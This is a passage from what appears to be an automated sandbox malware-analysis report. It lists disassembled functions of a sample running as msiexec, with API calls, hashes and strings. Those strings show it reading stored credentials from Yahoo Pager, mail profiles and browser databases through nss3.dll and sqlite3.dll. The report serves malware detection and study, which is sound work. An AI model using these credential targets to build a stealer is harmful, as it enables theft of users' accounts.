                                                                            • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                            • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                            • String ID: MS Sans Serif
                                                                            • API String ID: 3492281209-168460110
                                                                            • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                            • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                            • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                            • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                            Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_strcmpimemset
                                                                            • String ID: edit
                                                                            • API String ID: 275601554-2167791130
                                                                            • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                            • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                            • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                            • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                            Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$memset
                                                                            • String ID:
                                                                            • API String ID: 1860491036-0
                                                                            • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                            • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                            • Opcode Fuzzy Hash: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                            • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                            Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040D2C2
                                                                            • memset.MSVCRT ref: 0040D2D8
                                                                            • memset.MSVCRT ref: 0040D2EA
                                                                            • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                            • memset.MSVCRT ref: 0040D319
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$memcpy
                                                                            • String ID:
                                                                            • API String ID: 368790112-0
                                                                            • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                            • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                            • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                            • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                            Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • too many SQL variables, xrefs: 0042C6FD
                                                                            • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                            • API String ID: 2221118986-515162456
                                                                            • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                            • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                            • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                            • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                            Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                              • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                            • strlen.MSVCRT ref: 0040B60B
                                                                            • atoi.MSVCRT(?), ref: 0040B619
                                                                            • _mbsicmp.MSVCRT ref: 0040B66C
                                                                            • _mbsicmp.MSVCRT ref: 0040B67F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                            • String ID:
                                                                            • API String ID: 4107816708-0
                                                                            • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                            • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                            • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                            • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                            Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                            • _gmtime64.MSVCRT ref: 00411437
                                                                            • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                            • strftime.MSVCRT ref: 00411476
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                            • String ID:
                                                                            • API String ID: 1886415126-0
                                                                            • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                            • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                            • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                            • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                            Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: strlen
                                                                            • String ID: >$>$>
                                                                            • API String ID: 39653677-3911187716
                                                                            • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                            • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                            • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                            • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                            Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                            • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                            • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: @
                                                                            • API String ID: 3510742995-2766056989
                                                                            • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                            • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                            • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                            • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                            Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _strcmpi
                                                                            • String ID: C@$mail.identity
                                                                            • API String ID: 1439213657-721921413
                                                                            • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                            • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                            • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                            • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                            Function 00444551 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00444573
                                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValuememset
                                                                            • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                            • API String ID: 3363972335-1703613266
                                                                            • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                            • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                            • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                            • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                            Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _ultoasprintf
                                                                            • String ID: %s %s %s
                                                                            • API String ID: 432394123-3850900253
                                                                            • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                            • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                            • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                            • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                            Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadMenuA.USER32(00000000), ref: 00409078
                                                                            • sprintf.MSVCRT ref: 0040909B
                                                                              • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                              • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                              • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                              • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                              • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                            • String ID: menu_%d
                                                                            • API String ID: 1129539653-2417748251
                                                                            • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                            • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                            • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                            • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                            Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                            • _mbscat.MSVCRT ref: 004070FA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscat$_mbscpystrlen
                                                                            • String ID: sqlite3.dll
                                                                            • API String ID: 1983510840-1155512374
                                                                            • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                            • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                            • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                            • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                            Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString
                                                                            • String ID: A4@$Server Details
                                                                            • API String ID: 1096422788-4071850762
                                                                            • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                            • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                            • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                            • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                            Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • strlen.MSVCRT ref: 0040849A
                                                                            • memset.MSVCRT ref: 004084D2
                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,679D7B60,?,00000000), ref: 0040858F
                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,679D7B60,?,00000000), ref: 004085BA
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLocalmemcpymemsetstrlen
                                                                            • String ID:
                                                                            • API String ID: 3110682361-0
                                                                            • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                            • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                            • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                            • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                            Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                            • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID:
                                                                            • API String ID: 3510742995-0
                                                                            • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                            • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                            • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                            • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8